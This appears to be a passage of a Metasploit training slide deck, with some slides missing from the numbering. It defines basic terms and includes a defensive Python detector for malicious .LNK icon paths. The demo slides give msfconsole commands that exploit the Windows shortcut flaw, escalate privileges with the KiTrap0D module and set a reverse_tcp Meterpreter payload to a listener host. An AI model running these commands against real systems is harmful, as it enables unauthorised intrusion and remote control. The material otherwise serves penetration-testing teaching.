2. Introduction
• Metasploit is a free, open source penetration testing framework started by H. D. Moore in 2003 and later acquired by Rapid7. The current stable versions of the framework are written in Ruby. It has the world's largest database of tested exploits and receives more than a million downloads every year. It is also one of the most complex projects built in Ruby to date.
3. Terminology
Vulnerability: A weakness which allows an attacker/pentester to break into or compromise a system's security. This weakness can exist in the operating system, in application software, or even in the network protocols.
Exploit: Code which allows an attacker/tester to take advantage of a vulnerable system and compromise its security. Every vulnerability has its own corresponding exploit. Metasploit v4 has more than 1200 exploits.
Payload: The code which does the actual work. It runs on the system after exploitation. Payloads are mostly used to set up a connection between the attacking machine and the victim machine. Metasploit v4 has more than 400 payloads.
Module: Modules are the small building blocks of a complete system. Every module performs a specific task, and a complete system is built by combining several modules to function as a single unit. The biggest advantage of such an architecture is that it becomes easy for developers to integrate new exploit code and tools into the framework.
4. Demo
• msfconsole
It provides an "all-in-one" centralized console and gives you efficient access to virtually all of the options available in the Metasploit Framework.
5. Demo
• use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
• This vulnerability was also used by Stuxnet.
• This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. The module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
• CVE-2010-2568
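A defender-side check for the shortcut behaviour described on this slide, added here as an example and not part of the original deck or of Metasploit: it parses the StringData section of a .LNK file per the [MS-SHLLINK] layout and flags shortcuts whose ICON_LOCATION is a UNC path to a .dll or .cpl. The sample LNK bytes are constructed; shortcuts that carry the target only in the IDList are not covered by this heuristic.

```python
import struct

# LinkFlags bits from the Shell Link header (offset 0x14)
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_ORDER = (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR,
                HAS_ARGUMENTS, HAS_ICON_LOCATION)

def lnk_icon_location(data: bytes):
    """Return the ICON_LOCATION string of a .LNK, or None if it has none."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link header")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:        # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfo starts with LinkInfoSize
        pos += struct.unpack_from("<I", data, pos)[0]
    icon = None
    # StringData entries appear in fixed order: CountCharacters + characters
    for flag in STRING_ORDER:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        text = raw.decode("utf-16-le" if width == 2 else "latin-1")
        if flag == HAS_ICON_LOCATION:
            icon = text
    return icon

def icon_from_unc(data: bytes) -> bool:
    """True if the shortcut loads its icon from a UNC share as a .dll/.cpl."""
    icon = lnk_icon_location(data)
    return bool(icon) and icon.startswith("\\\\") and icon.lower().endswith((".dll", ".cpl"))

def build_lnk(icon: str) -> bytes:
    """Constructed sample: 76-byte header + one Unicode ICON_LOCATION string."""
    header = bytearray(0x4C)
    struct.pack_into("<I", header, 0, 0x4C)
    header[4:20] = bytes.fromhex("0114020000000000C000000000000046")  # LinkCLSID
    struct.pack_into("<I", header, 0x14, HAS_ICON_LOCATION | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")

if __name__ == "__main__":
    # constructed address from the documentation range, not a real host
    print(icon_from_unc(build_lnk("\\\\192.0.2.10\\share\\icon.dll")))
```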
13. Demo
• shell
• net user Rupam
This is a local admin. Now we will try to elevate privileges to get SYSTEM level access.
14. Demo
• Background
• use exploit/windows/local/ [TAB TAB]
• use exploit/windows/local/ms10_015_kitrap0d
• This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated, the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.
15. Demo
• set SESSION 1
• set PAYLOAD windows/meterpreter/reverse_tcp
• set LHOST 192.168.56.102
• set LPORT 4443
• show options
• exploit